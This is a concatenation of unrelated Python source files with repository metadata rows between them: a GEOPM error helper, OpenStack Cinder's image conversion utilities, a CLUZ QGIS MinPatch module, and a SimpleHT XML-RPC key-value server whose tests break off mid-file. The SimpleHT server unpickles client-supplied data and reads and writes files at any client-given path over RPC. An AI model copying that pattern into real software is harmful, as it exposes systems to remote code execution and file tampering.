ERROR_AFFINITY = _dl.GEOPM_ERROR_AFFINITY
ERROR_NO_AGENT = _dl.GEOPM_ERROR_NO_AGENT
def message(err_number):
"""Return the error message associated with the error code. Positive
error codes are interpreted as system error numbers, and
negative error codes are interpreted as GEOPM error numbers.
Args:
err_number (int): Error code to be interpreted.
Returns:
str: Error message associated with error code.
"""
global _ffi
global _dl
name_max = 1024
result_cstr = _ffi.new("char[]", name_max)
_dl.geopm_error_message(err_number, result_cstr, name_max)
return _ffi.string(result_cstr).decode()
def exc_clear():
"""Clear out exception record when run with python2, in python3 this
is cleared automatically when you leave the except clause.
"""
if 'exc_clear' in dir(sys):
sys.exc_clear()
| bsd-3-clause | 1,610,141,121,753,856,000 | 35.754717 | 106 | 0.717659 | false |
blueboxgroup/cinder | cinder/image/image_utils.py | 1 | 16990 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Helper methods to deal with images.
This is essentially a copy from nova.virt.images.py
Some slight modifications, but at some point
we should look at maybe pushing this up to Oslo
"""
import contextlib
import os
import tempfile
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_utils import timeutils
from oslo_utils import units
from cinder import exception
from cinder.i18n import _
from cinder.openstack.common import fileutils
from cinder.openstack.common import imageutils
from cinder.openstack.common import log as logging
from cinder import utils
from cinder.volume import utils as volume_utils
LOG = logging.getLogger(__name__)
image_helper_opt = [cfg.StrOpt('image_conversion_dir',
default='$state_path/conversion',
help='Directory used for temporary storage '
'during image conversion'), ]
CONF = cfg.CONF
CONF.register_opts(image_helper_opt)
def qemu_img_info(path, run_as_root=True):
"""Return a object containing the parsed output from qemu-img info."""
cmd = ('env', 'LC_ALL=C', 'qemu-img', 'info', path)
if os.name == 'nt':
cmd = cmd[2:]
out, _err = utils.execute(*cmd, run_as_root=run_as_root)
return imageutils.QemuImgInfo(out)
def convert_image(source, dest, out_format, bps_limit=None, run_as_root=True):
"""Convert image to other format."""
cmd = ('qemu-img', 'convert',
'-O', out_format, source, dest)
# Check whether O_DIRECT is supported and set '-t none' if it is
# This is needed to ensure that all data hit the device before
# it gets unmapped remotely from the host for some backends
# Reference Bug: #1363016
# NOTE(jdg): In the case of file devices qemu does the
# flush properly and more efficiently than would be done
# setting O_DIRECT, so check for that and skip the
# setting for non BLK devs
if (utils.is_blk_device(dest) and
volume_utils.check_for_odirect_support(source,
dest,
'oflag=direct')):
cmd = ('qemu-img', 'convert',
'-t', 'none',
'-O', out_format, source, dest)
start_time = timeutils.utcnow()
cgcmd = volume_utils.setup_blkio_cgroup(source, dest, bps_limit)
if cgcmd:
cmd = tuple(cgcmd) + cmd
utils.execute(*cmd, run_as_root=run_as_root)
duration = timeutils.delta_seconds(start_time, timeutils.utcnow())
# NOTE(jdg): use a default of 1, mostly for unit test, but in
# some incredible event this is 0 (cirros image?) don't barf
if duration < 1:
duration = 1
fsz_mb = os.stat(source).st_size / units.Mi
mbps = (fsz_mb / duration)
msg = ("Image conversion details: src %(src)s, size %(sz).2f MB, "
"duration %(duration).2f sec, destination %(dest)s")
LOG.debug(msg % {"src": source,
"sz": fsz_mb,
"duration": duration,
"dest": dest})
msg = _("Converted %(sz).2f MB image at %(mbps).2f MB/s")
LOG.info(msg % {"sz": fsz_mb, "mbps": mbps})
def resize_image(source, size, run_as_root=False):
"""Changes the virtual size of the image."""
cmd = ('qemu-img', 'resize', source, '%sG' % size)
utils.execute(*cmd, run_as_root=run_as_root)
def fetch(context, image_service, image_id, path, _user_id, _project_id):
# TODO(vish): Improve context handling and add owner and auth data
# when it is added to glance. Right now there is no
# auth checking in glance, so we assume that access was
# checked before we got here.
start_time = timeutils.utcnow()
with fileutils.remove_path_on_error(path):
with open(path, "wb") as image_file:
image_service.download(context, image_id, image_file)
duration = timeutils.delta_seconds(start_time, timeutils.utcnow())
# NOTE(jdg): use a default of 1, mostly for unit test, but in
# some incredible event this is 0 (cirros image?) don't barf
if duration < 1:
duration = 1
fsz_mb = os.stat(image_file.name).st_size / units.Mi
mbps = (fsz_mb / duration)
msg = ("Image fetch details: dest %(dest)s, size %(sz).2f MB, "
"duration %(duration).2f sec")
LOG.debug(msg % {"dest": image_file.name,
"sz": fsz_mb,
"duration": duration})
msg = _("Image download %(sz).2f MB at %(mbps).2f MB/s")
LOG.info(msg % {"sz": fsz_mb, "mbps": mbps})
def fetch_verify_image(context, image_service, image_id, dest,
user_id=None, project_id=None, size=None,
run_as_root=True):
fetch(context, image_service, image_id, dest,
None, None)
with fileutils.remove_path_on_error(dest):
data = qemu_img_info(dest, run_as_root=run_as_root)
fmt = data.file_format
if fmt is None:
raise exception.ImageUnacceptable(
reason=_("'qemu-img info' parsing failed."),
image_id=image_id)
backing_file = data.backing_file
if backing_file is not None:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=(_("fmt=%(fmt)s backed by: %(backing_file)s") %
{'fmt': fmt, 'backing_file': backing_file}))
# NOTE(xqueralt): If the image virtual size doesn't fit in the
# requested volume there is no point on resizing it because it will
# generate an unusable image.
if size is not None and data.virtual_size > size:
params = {'image_size': data.virtual_size, 'volume_size': size}
reason = _("Size is %(image_size)dGB and doesn't fit in a "
"volume of size %(volume_size)dGB.") % params
raise exception.ImageUnacceptable(image_id=image_id, reason=reason)
def fetch_to_vhd(context, image_service,
image_id, dest, blocksize,
user_id=None, project_id=None, run_as_root=True):
fetch_to_volume_format(context, image_service, image_id, dest, 'vpc',
blocksize, user_id, project_id,
run_as_root=run_as_root)
def fetch_to_raw(context, image_service,
image_id, dest, blocksize,
user_id=None, project_id=None, size=None, run_as_root=True):
fetch_to_volume_format(context, image_service, image_id, dest, 'raw',
blocksize, user_id, project_id, size,
run_as_root=run_as_root)
def fetch_to_volume_format(context, image_service,
image_id, dest, volume_format, blocksize,
user_id=None, project_id=None, size=None,
run_as_root=True):
qemu_img = True
image_meta = image_service.show(context, image_id)
# NOTE(avishay): I'm not crazy about creating temp files which may be
# large and cause disk full errors which would confuse users.
# Unfortunately it seems that you can't pipe to 'qemu-img convert' because
# it seeks. Maybe we can think of something for a future version.
with temporary_file() as tmp:
# We may be on a system that doesn't have qemu-img installed. That
# is ok if we are working with a RAW image. This logic checks to see
# if qemu-img is installed. If not we make sure the image is RAW and
# throw an exception if not. Otherwise we stop before needing
# qemu-img. Systems with qemu-img will always progress through the
# whole function.
try:
# Use the empty tmp file to make sure qemu_img_info works.
qemu_img_info(tmp, run_as_root=run_as_root)
except processutils.ProcessExecutionError:
qemu_img = False
if image_meta:
if image_meta['disk_format'] != 'raw':
raise exception.ImageUnacceptable(
reason=_("qemu-img is not installed and image is of "
"type %s. Only RAW images can be used if "
"qemu-img is not installed.") %
image_meta['disk_format'],
image_id=image_id)
else:
raise exception.ImageUnacceptable(
reason=_("qemu-img is not installed and the disk "
"format is not specified. Only RAW images "
"can be used if qemu-img is not installed."),
image_id=image_id)
fetch(context, image_service, image_id, tmp, user_id, project_id)
if is_xenserver_image(context, image_service, image_id):
replace_xenserver_image_with_coalesced_vhd(tmp)
if not qemu_img:
# qemu-img is not installed but we do have a RAW image. As a
# result we only need to copy the image to the destination and then
# return.
LOG.debug('Copying image from %(tmp)s to volume %(dest)s - '
'size: %(size)s' % {'tmp': tmp, 'dest': dest,
'size': image_meta['size']})
volume_utils.copy_volume(tmp, dest, image_meta['size'], blocksize)
return
data = qemu_img_info(tmp, run_as_root=run_as_root)
virt_size = data.virtual_size / units.Gi
# NOTE(xqueralt): If the image virtual size doesn't fit in the
# requested volume there is no point on resizing it because it will
# generate an unusable image.
if size is not None and virt_size > size:
params = {'image_size': virt_size, 'volume_size': size}
reason = _("Size is %(image_size)dGB and doesn't fit in a "
"volume of size %(volume_size)dGB.") % params
raise exception.ImageUnacceptable(image_id=image_id, reason=reason)
fmt = data.file_format
if fmt is None:
raise exception.ImageUnacceptable(
reason=_("'qemu-img info' parsing failed."),
image_id=image_id)
backing_file = data.backing_file
if backing_file is not None:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=_("fmt=%(fmt)s backed by:%(backing_file)s")
% {'fmt': fmt, 'backing_file': backing_file, })
# NOTE(jdg): I'm using qemu-img convert to write
# to the volume regardless if it *needs* conversion or not
# TODO(avishay): We can speed this up by checking if the image is raw
# and if so, writing directly to the device. However, we need to keep
# check via 'qemu-img info' that what we copied was in fact a raw
# image and not a different format with a backing file, which may be
# malicious.
LOG.debug("%s was %s, converting to %s " % (image_id, fmt,
volume_format))
convert_image(tmp, dest, volume_format,
bps_limit=CONF.volume_copy_bps_limit,
run_as_root=run_as_root)
data = qemu_img_info(dest, run_as_root=run_as_root)
if data.file_format != volume_format:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=_("Converted to %(vol_format)s, but format is "
"now %(file_format)s") % {'vol_format': volume_format,
'file_format': data.
file_format})
def upload_volume(context, image_service, image_meta, volume_path,
volume_format='raw', run_as_root=True):
image_id = image_meta['id']
if (image_meta['disk_format'] == volume_format):
LOG.debug("%s was %s, no need to convert to %s" %
(image_id, volume_format, image_meta['disk_format']))
if os.name == 'nt' or os.access(volume_path, os.R_OK):
with fileutils.file_open(volume_path, 'rb') as image_file:
image_service.update(context, image_id, {}, image_file)
else:
with utils.temporary_chown(volume_path):
with fileutils.file_open(volume_path) as image_file:
image_service.update(context, image_id, {}, image_file)
return
with temporary_file() as tmp:
LOG.debug("%s was %s, converting to %s" %
(image_id, volume_format, image_meta['disk_format']))
convert_image(volume_path, tmp, image_meta['disk_format'],
bps_limit=CONF.volume_copy_bps_limit,
run_as_root=run_as_root)
data = qemu_img_info(tmp, run_as_root=run_as_root)
if data.file_format != image_meta['disk_format']:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=_("Converted to %(f1)s, but format is now %(f2)s") %
{'f1': image_meta['disk_format'], 'f2': data.file_format})
with fileutils.file_open(tmp, 'rb') as image_file:
image_service.update(context, image_id, {}, image_file)
def is_xenserver_image(context, image_service, image_id):
image_meta = image_service.show(context, image_id)
return is_xenserver_format(image_meta)
def is_xenserver_format(image_meta):
return (
image_meta['disk_format'] == 'vhd'
and image_meta['container_format'] == 'ovf'
)
def set_vhd_parent(vhd_path, parentpath):
utils.execute('vhd-util', 'modify', '-n', vhd_path, '-p', parentpath)
def extract_targz(archive_name, target):
utils.execute('tar', '-xzf', archive_name, '-C', target)
def fix_vhd_chain(vhd_chain):
for child, parent in zip(vhd_chain[:-1], vhd_chain[1:]):
set_vhd_parent(child, parent)
def get_vhd_size(vhd_path):
out, _err = utils.execute('vhd-util', 'query', '-n', vhd_path, '-v')
return int(out)
def resize_vhd(vhd_path, size, journal):
utils.execute(
'vhd-util', 'resize', '-n', vhd_path, '-s', '%d' % size, '-j', journal)
def coalesce_vhd(vhd_path):
utils.execute(
'vhd-util', 'coalesce', '-n', vhd_path)
def create_temporary_file(*args, **kwargs):
if (CONF.image_conversion_dir and not
os.path.exists(CONF.image_conversion_dir)):
os.makedirs(CONF.image_conversion_dir)
fd, tmp = tempfile.mkstemp(dir=CONF.image_conversion_dir, *args, **kwargs)
os.close(fd)
return tmp
@contextlib.contextmanager
def temporary_file(*args, **kwargs):
tmp = None
try:
tmp = create_temporary_file(*args, **kwargs)
yield tmp
finally:
if tmp:
fileutils.delete_if_exists(tmp)
def temporary_dir():
if (CONF.image_conversion_dir and not
os.path.exists(CONF.image_conversion_dir)):
os.makedirs(CONF.image_conversion_dir)
return utils.tempdir(dir=CONF.image_conversion_dir)
def coalesce_chain(vhd_chain):
for child, parent in zip(vhd_chain[:-1], vhd_chain[1:]):
with temporary_dir() as directory_for_journal:
size = get_vhd_size(child)
journal_file = os.path.join(
directory_for_journal, 'vhd-util-resize-journal')
resize_vhd(parent, size, journal_file)
coalesce_vhd(child)
return vhd_chain[-1]
def discover_vhd_chain(directory):
counter = 0
chain = []
while True:
fpath = os.path.join(directory, '%d.vhd' % counter)
if os.path.exists(fpath):
chain.append(fpath)
else:
break
counter += 1
return chain
def replace_xenserver_image_with_coalesced_vhd(image_file):
with temporary_dir() as tempdir:
extract_targz(image_file, tempdir)
chain = discover_vhd_chain(tempdir)
fix_vhd_chain(chain)
coalesced = coalesce_chain(chain)
fileutils.delete_if_exists(image_file)
os.rename(coalesced, image_file)
| apache-2.0 | 4,822,887,739,440,777,000 | 38.696262 | 79 | 0.588994 | false |
AnotherBobSmith/CLUZ | cluz_mpmain.py | 1 | 12019 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
A QGIS plugin
CLUZ for QGIS
-------------------
begin : 2016-23-02
copyright : (C) 2016 by Bob Smith, DICE
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import qgis
from qgis.gui import *
import os
import copy
import cluz_mpfunctions
import cluz_mpoutputs
import cluz_mpsetup
import cluz_functions2
import cluz_display
def runMinPatch(setupObject, minpatchObject, minpatchDataDict):
marxanNameString = minpatchObject.marxanFileName + "_r"
finalNameString = "mp_" + marxanNameString
marxanSolFileList = cluz_mpsetup.makeMarxanFileList(setupObject, marxanNameString)
preMarxanUnitDict = minpatchDataDict["initialUnitDictionary"]
summedSolDict = cluz_mpoutputs.produceSummedDict(preMarxanUnitDict)
patchResultsDict = {}
zoneStatsDict = {}
zoneFeaturePropStatsDict = {}
bestPortfolioCost = -1
continueBool = True
for marxanSolFilePath in marxanSolFileList:
runningUnitDict = createRunningUnitDictionary(minpatchDataDict, marxanSolFilePath)
patchDict = cluz_mpfunctions.makePatchDict(runningUnitDict, minpatchDataDict)
qgis.utils.iface.mainWindow().statusBar().showMessage("Processing file " + marxanSolFilePath + ".")
if minpatchDataDict["patch_stats"] and continueBool:
beforePatchStatsDict = cluz_mpoutputs.makePatchStatsDict(patchDict, minpatchDataDict)
if minpatchDataDict["rem_small_patch"] and continueBool:
runningUnitDict = cluz_mpfunctions.remSmallPatchesFromUnitDict(minpatchDataDict,runningUnitDict, patchDict)
qgis.utils.iface.mainWindow().statusBar().showMessage("Processing file " + marxanSolFilePath + ". Removing patches that are smaller than the specified thresholds...")
if minpatchDataDict["add_patches"] and continueBool:
runningUnitDict, continueBool = cluz_mpfunctions.addPatches(minpatchDataDict, runningUnitDict)
qgis.utils.iface.mainWindow().statusBar().showMessage("Processing file " + marxanSolFilePath + ". Adding new patches...")
if minpatchDataDict["whittle_polish"] and continueBool:
runningUnitDict = cluz_mpfunctions.runSimWhittle(runningUnitDict, minpatchDataDict)
qgis.utils.iface.mainWindow().statusBar().showMessage("Processing file " + marxanSolFilePath + ". Simulated whittling...")
runningUnitDict = addConservedPUs(runningUnitDict,minpatchDataDict)
if minpatchDataDict["patch_stats"] and continueBool:
patchDict = cluz_mpfunctions.makePatchDict(runningUnitDict, minpatchDataDict)
afterPatchStatsDict = cluz_mpoutputs.makePatchStatsDict(patchDict, minpatchDataDict)
if continueBool:
outputFilePath = marxanSolFilePath.replace(marxanNameString, finalNameString)
cluz_mpoutputs.printRunResults(minpatchDataDict, runningUnitDict, outputFilePath)
costDict = makeCostDict(minpatchDataDict, runningUnitDict)
totalCost = costDict['totalBoundaryCost'] + costDict['totalUnitCost']
if minpatchDataDict["patch_stats"]:
patchResultsDict = cluz_mpoutputs.producePatchResultsDict(patchResultsDict, marxanSolFilePath, beforePatchStatsDict, afterPatchStatsDict, costDict)
if minpatchDataDict["zone_stats"]:
zoneNameString = os.path.basename(marxanSolFilePath)
zoneStatsDict[zoneNameString] = cluz_mpoutputs.makeRunZoneStatsDict(minpatchDataDict, runningUnitDict, zoneStatsDict)
zoneFeaturePropStatsDict[zoneNameString] = cluz_mpoutputs.makeRunZoneFeaturePropStatsDict(minpatchDataDict, runningUnitDict)
if bestPortfolioCost == -1:
bestPortfolioCost = totalCost
bestPortfolio = copy.deepcopy(runningUnitDict)
if bestPortfolioCost <> -1 and totalCost < bestPortfolioCost:
bestPortfolioCost = totalCost
bestPortfolio = copy.deepcopy(runningUnitDict)
summedDict = cluz_mpoutputs.updateSummedDict(summedSolDict,runningUnitDict)
if continueBool:
bestFileName = setupObject.outputPath + os.sep + 'mp_' + minpatchObject.marxanFileName + '_best.txt'
cluz_mpoutputs.printRunResults(minpatchDataDict, bestPortfolio, bestFileName)
summedFileName = setupObject.outputPath + os.sep + 'mp_' + minpatchObject.marxanFileName + '_summed.txt'
cluz_mpoutputs.printSummedResults(summedDict, summedFileName)
if minpatchDataDict["patch_stats"]:
patchstatsFileName = setupObject.outputPath + os.sep + 'mp_' + minpatchObject.marxanFileName + '_patchstats.csv'
cluz_mpoutputs.printPatchStats(patchResultsDict, patchstatsFileName)
if minpatchDataDict["zone_stats"]:
zoneStatsBaseFileName = setupObject.outputPath + os.sep + 'mp_' + minpatchObject.marxanFileName
cluz_mpoutputs.printZoneStats(minpatchDataDict, zoneStatsDict, zoneStatsBaseFileName)
cluz_mpoutputs.printZoneFeaturePropStats(minpatchDataDict, zoneFeaturePropStatsDict, zoneStatsBaseFileName)
cluz_functions2.addBestMarxanOutputToPUShapefile(setupObject, bestFileName, "MP_Best")
cluz_functions2.addSummedMarxanOutputToPUShapefile(setupObject, summedFileName, "MP_SF_Scr")
cluz_display.reloadPULayer(setupObject)
cluz_display.removePreviousMinPatchLayers()
bestLayerName = "MP Best (" + minpatchObject.marxanFileName + ")"
summedLayerName = "MP SF_Score (" + minpatchObject.marxanFileName + ")"
cluz_display.displayBestOutput(setupObject, "MP_Best", bestLayerName)
cluz_display.displayGraduatedLayer(setupObject, "MP_SF_Scr", summedLayerName, 1) #1 is SF legend code
qgis.utils.iface.mainWindow().statusBar().showMessage("")
qgis.utils.iface.messageBar().pushMessage("MinPatch results", "MinPatch has completed the analysis and the results files are in the specified output folder.", QgsMessageBar.INFO, 3)
def createRunningUnitDictionary(minpatchDataDict, marxanSolLocationString):
preMarxanUnitDict = minpatchDataDict["initialUnitDictionary"]
initUnitDict = copy.deepcopy(preMarxanUnitDict)
marxanSolDictOKBool, aMarxanSolDict = cluz_mpsetup.makeMarxanSolDict(marxanSolLocationString) #marxanSolDictOKBool not used here
runningUnitDict = makeStartUnitDict(initUnitDict, aMarxanSolDict)
return runningUnitDict
def makeStartUnitDict(unitDictionary, marxanSolDictionary):
for aRow in marxanSolDictionary:
solPUStatus = marxanSolDictionary[aRow]
if solPUStatus == 1:
puList = unitDictionary[aRow]
puList[1] = 1
unitDictionary[aRow] = puList
return unitDictionary
def addConservedPUs(runningUnitDict, minpatchDataDict):
initUnitDict = minpatchDataDict["initialUnitDictionary"]
for puUnitValue in runningUnitDict:
if initUnitDict[puUnitValue][1] == 2:
puList = runningUnitDict[puUnitValue]
puList[1] = 2
runningUnitDict[puUnitValue] = puList
return runningUnitDict
def makeCostDict(minpatchDataDict, puDict):
costDict = {}
abundanceMatrixDict = minpatchDataDict["abundanceMatrixDictionary"]
targetDict = minpatchDataDict["targetDictionary"]
boundaryMatrixDict = minpatchDataDict["boundaryMatrixDictionary"]
targetList = targetDict.keys()
targetList.sort()
abundValuesDict, numActivePUs = makeAbundValuesDict_numActivePUs(targetList, abundanceMatrixDict, puDict)
costDict["abundanceValuesDictionary"] = abundValuesDict
costDict["numberActivePUs"] = numActivePUs
totalUnitCost, conUnitCount = calcUnitCosts(puDict)
costDict["totalUnitCost"] = totalUnitCost
costDict["conservedUnitCount"] = conUnitCount
amountConservedDict = makeAmountConservedDictionary(targetList, abundanceMatrixDict, puDict)
costDict["amountConservedDictionary"] = amountConservedDict
costDict["totalTargetCost"] = makeTotalTargetCost(amountConservedDict, targetDict)
totalBoundLength, totalBoundaryCost = makeBoundCosts(minpatchDataDict, boundaryMatrixDict, puDict)
costDict["totalBoundaryLength"] = totalBoundLength
costDict["totalBoundaryCost"] = totalBoundaryCost
return costDict
def makeAbundValuesDict_numActivePUs(targetList, abundanceMatrixDict, puDict):
numActivePUs = 0
abundValuesDict = {}
for aRow in targetList:
abundValuesDict[aRow] = [0, 0, 0, 0]
for aUnit in abundanceMatrixDict:
puList = puDict[aUnit]
puStatus = puList[1]
#Count the number of units that could be selected in the iteration section
if puStatus == 0 or puStatus ==1:
numActivePUs += 1
puAbundDict = abundanceMatrixDict[aUnit]
for aFeature in puAbundDict:
theAmount = puAbundDict[aFeature]
featureList = abundValuesDict[aFeature]
runningValue = featureList[puStatus]
runningValue += theAmount
featureList[puStatus] = runningValue
abundValuesDict[aFeature] = featureList
return abundValuesDict, numActivePUs
def calcUnitCosts(puDict):
totalUnitCost = 0
conUnitCount = 0
for unitID in puDict:
theList = puDict[unitID]
unitValue, unitStatus = theList
if unitStatus == 1 or unitStatus == 2:
totalUnitCost += unitValue
conUnitCount += 1
return totalUnitCost, conUnitCount
def makeAmountConservedDictionary(targetList, abundanceMatrixDictionary, unitDictionary):
amountConservedDict = {}
for bNum in targetList:
amountConservedDict[bNum] = 0
for puID in abundanceMatrixDictionary:
puStatus = unitDictionary[puID][1]
if puStatus == 1 or puStatus == 2:
puAbundDict = abundanceMatrixDictionary[puID]
for featID in puAbundDict:
featAmount = puAbundDict[featID]
conTotalValue = amountConservedDict[featID]
conTotalValue += featAmount
amountConservedDict[featID] = conTotalValue
return amountConservedDict
def makeTotalTargetCost(amountConservedDictionary, targetDictionary):
totalTargetCost = 0
for featureID in amountConservedDictionary.keys():
amountConserved = amountConservedDictionary[featureID]
targetValuesList = targetDictionary[featureID]
theTarget = targetValuesList[1]
thePenalty = targetValuesList[2]
if amountConserved < theTarget:
totalTargetCost = totalTargetCost + thePenalty
return totalTargetCost
def makeBoundCosts(minpatchDataDict, boundaryMatrixDict, puDict):
totalBoundLength = cluz_functions2.calcTotalBoundLength(boundaryMatrixDict, puDict)
BLMvalue = minpatchDataDict["bound_cost"]
totalBoundaryCost = totalBoundLength * BLMvalue
return totalBoundLength, totalBoundaryCost
| gpl-2.0 | 6,864,057,697,020,695,000 | 45.133333 | 189 | 0.672685 | false |
juncgu/FUSE | server0/simpleht.py | 1 | 11113 | #!/usr/bin/env python
"""
Author: David Wolinsky
Version: 0.02
Description:
The XmlRpc API for this library is:
get(base64 key)
Returns the value and ttl associated with the given key using a dictionary
or an empty dictionary if there is no matching key
Example usage:
rv = rpc.get(Binary("key"))
print rv => {"value": Binary, "ttl": 1000}
print rv["value"].data => "value"
put(base64 key, base64 value, int ttl)
Inserts the key / value pair into the hashtable, using the same key will
over-write existing values
Example usage: rpc.put(Binary("key"), Binary("value"), 1000)
print_content()
Print the contents of the HT
read_file(string filename)
Store the contents of the Hahelperable into a file
write_file(string filename)
Load the contents of the file into the Hahelperable
"""
import sys, SimpleXMLRPCServer, getopt, pickle, time, threading, xmlrpclib, unittest
import random, copy
from datetime import datetime, timedelta
from xmlrpclib import Binary
from threading import Lock, RLock
# Presents a HT interface
class SimpleHT:
def __init__(self):
self.data = {}
self.next_check = datetime.now() + timedelta(minutes = 5)
random.seed()
self.dump = 1
def count(self):
# Remove expired entries
self.next_check = datetime.now() - timedelta(minutes = 5)
self.check()
return len(self.data)
# Retrieve something from the HT
def get(self, key):
"""Juncheng Gu:
The simulation of StandardError
prob = random.random()
if prob < 0.005:
raise StandardError
"""
# Remove expired entries
self.check()
# Default return value
rv = {}
# If the key is in the data structure, return properly formated results
key = key.data
if key in self.data:
ent = self.data[key]
now = datetime.now()
if ent[1] > now:
ttl = (ent[1] - now).seconds
rv = {"value": Binary(ent[0]), "ttl": ttl}
else:
del self.data[key]
return rv
# Insert something into the HT
def put(self, key, value, ttl):
# Remove expired entries
self.check()
end = datetime.now() + timedelta(seconds = ttl)
self.data[key.data] = (value.data, end)
return True
"""
acquire read lock
"""
def acquire_r_lock(self, key, u_id):
file = copy.deepcopy(pickle.loads(self.data[key.data][0]))
r = file['w_lock']
user = pickle.loads(u_id.data)
print user, " enter acquire_R_lock"
print " ", key, "pre r_lock", file['r_lock']
print " ", key, "pre w_lock", r
if file['w_lock'] == 0:
file['r_lock'] = file['r_lock'] + 1
self.check()
end = datetime.now() + timedelta(seconds = 10000)
self.data[key.data] = (pickle.dumps(file), end)
print " ", key, "aft r_lock", file['r_lock']
print " ", key, "aft w_lock", file['w_lock']
print user, " leave acquire_R_lock"
return Binary(pickle.dumps(r))
"""
acquire write lock
"""
def acquire_w_lock(self, key, u_id):
file = copy.deepcopy(pickle.loads(self.data[key.data][0]))
w = (copy.deepcopy(file['r_lock']), copy.deepcopy(file['w_lock']))
user = pickle.loads(u_id.data)
print user, "enter acquire_W_lock"
print " ", key, "pre r_lock", file['r_lock']
print " ", key, "pre w_lock", file['w_lock']
sum = w[0] + w[1]
if sum == 0:
file['w_lock'] = 1
self.check()
end = datetime.now() + timedelta(seconds = 10000)
self.data[key.data] = (pickle.dumps(file), end)
print " ", key, "aft r_lock", file['r_lock']
print " ", key, "aft w_lock", file['w_lock']
print user, " leave acquire_W_lock"
return Binary(pickle.dumps(w))
"""
release read lock
"""
def release_r_lock(self, key, u_id):
file = copy.deepcopy(pickle.loads(self.data[key.data][0]))
user = pickle.loads(u_id.data)
print user, "enter release_R_lock"
print " ", key, "pre r_lock", file['r_lock']
print " ", key, "pre w_lock", file['w_lock']
file['r_lock'] -= 1
self.check()
end = datetime.now() + timedelta(seconds = 10000)
self.data[key.data] = (pickle.dumps(file), end)
print " ", key, "aft r_lock", file['r_lock']
print " ", key, "aft w_lock", file['w_lock']
print user, " leave release_R_lock"
return True
"""
release write lock and write back data
"""
def release_w_lock(self, key, u_id, ctx):
self.check()
end = datetime.now() + timedelta(seconds = 10000)
self.data[key.data] = (ctx.data, end)
file = copy.deepcopy(pickle.loads(self.data[key.data][0]))
user = pickle.loads(u_id.data)
print user, "enter release_W_lock"
print " ", key, "pre r_lock", file['r_lock']
print " ", key, "pre w_lock", file['w_lock']
file['w_lock'] = 0
self.check()
end = datetime.now() + timedelta(seconds = 10000)
self.data[key.data] = (pickle.dumps(file), end)
print " ", key, "aft r_lock", file['r_lock']
print " ", key, "aft w_lock", file['w_lock']
print user, " leave release_R_lock"
return True
"""
acquire delete lock
"""
def acquire_d_lock(self, key, u_id):
file = copy.deepcopy(pickle.loads(self.data[key.data][0]))
user = pickle.loads(u_id.data)
print user, " enter acquire_D_lock"
print " ", key, "pre r_lock", file['r_lock']
print " ", key, "pre w_lock", file['w_lock']
d = file['r_lock'] + file['w_lock']
print " ", key, "aft r_lock", file['r_lock']
print " ", key, "aft w_lock", file['w_lock']
print user, " leave acquire_D_lock"
return Binary(pickle.dumps(d))
# Load contents from a file
def read_file(self, filename):
f = open(filename.data, "rb")
self.data = pickle.load(f)
f.close()
return True
# Write contents to a file
def write_file(self, filename):
f = open(filename.data, "wb")
pickle.dump(self.data, f)
f.close()
return True
# Print the contents of the hashtable
def print_content(self):
print self.data
return True
# Remove expired entries
def check(self):
now = datetime.now()
if self.next_check > now:
return
self.next_check = datetime.now() + timedelta(minutes = 5)
to_remove = []
for key, value in self.data.items():
if value[1] < now:
to_remove.append(key)
for key in to_remove:
del self.data[key]
"""
used to test the atomicity of server
"""
def test_atomicity(self, key):
print "The client ", key.data , "enter"
time.sleep(5)
print "The client ", key.data , "leave"
return True
def main():
optlist, args = getopt.getopt(sys.argv[1:], "", ["port=", "test"])
ol={}
for k,v in optlist:
ol[k] = v
port = 9000
if "--port" in ol:
port = int(ol["--port"])
if "--test" in ol:
sys.argv.remove("--test")
unittest.main()
return
serve(port)
# Start the xmlrpc server
def serve(port):
file_server = SimpleXMLRPCServer.SimpleXMLRPCServer(('', port))
file_server.register_introspection_functions()
sht = SimpleHT()
file_server.register_function(sht.get)
file_server.register_function(sht.put)
file_server.register_function(sht.acquire_d_lock)
file_server.register_function(sht.acquire_r_lock)
file_server.register_function(sht.acquire_w_lock)
file_server.register_function(sht.release_r_lock)
file_server.register_function(sht.release_w_lock)
file_server.register_function(sht.test_atomicity)
file_server.register_function(sht.print_content)
file_server.register_function(sht.read_file)
file_server.register_function(sht.write_file)
file_server.serve_forever()
# Execute the xmlrpc in a thread ... needed for testing
class serve_thread:
def __call__(self, port):
serve(port)
# Wrapper functions so the tests don't need to be concerned about Binary blobs
class Helper:
def __init__(self, caller):
self.caller = caller
def put(self, key, val, ttl):
return self.caller.put(Binary(key), Binary(val), ttl)
def get(self, key):
return self.caller.get(Binary(key))
def write_file(self, filename):
return self.caller.write_file(Binary(filename))
def read_file(self, filename):
return self.caller.read_file(Binary(filename))
def acquire_r_lock(self, key, u_id):
return self.caller.acquire_r_lock(Binary(key), Binary(u_id))
def acquire_w_lock(self, key, u_id):
return self.caller.acquire_w_lock(Binary(key), Binary(u_id))
def acquire_d_lock(self, key, u_id):
return self.caller.acquire_d_lock(Binary(key), Binary(u_id))
def release_r_lock(self, key, u_id):
return self.caller.release_r_lock(Binary(key), Binary(u_id))
def release_w_lock(self, key, u_id):
return self.caller.release_w_lock(Binary(key), Binary(u_id))
class SimpleHTTest(unittest.TestCase):
def test_direct(self):
helper = Helper(SimpleHT())
self.assertEqual(helper.get("test"), {}, "DHT isn't empty")
self.assertTrue(helper.put("test", "test", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test", "Failed to perform single get")
self.assertTrue(helper.put("test", "test0", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test0", "Failed to perform overwrite")
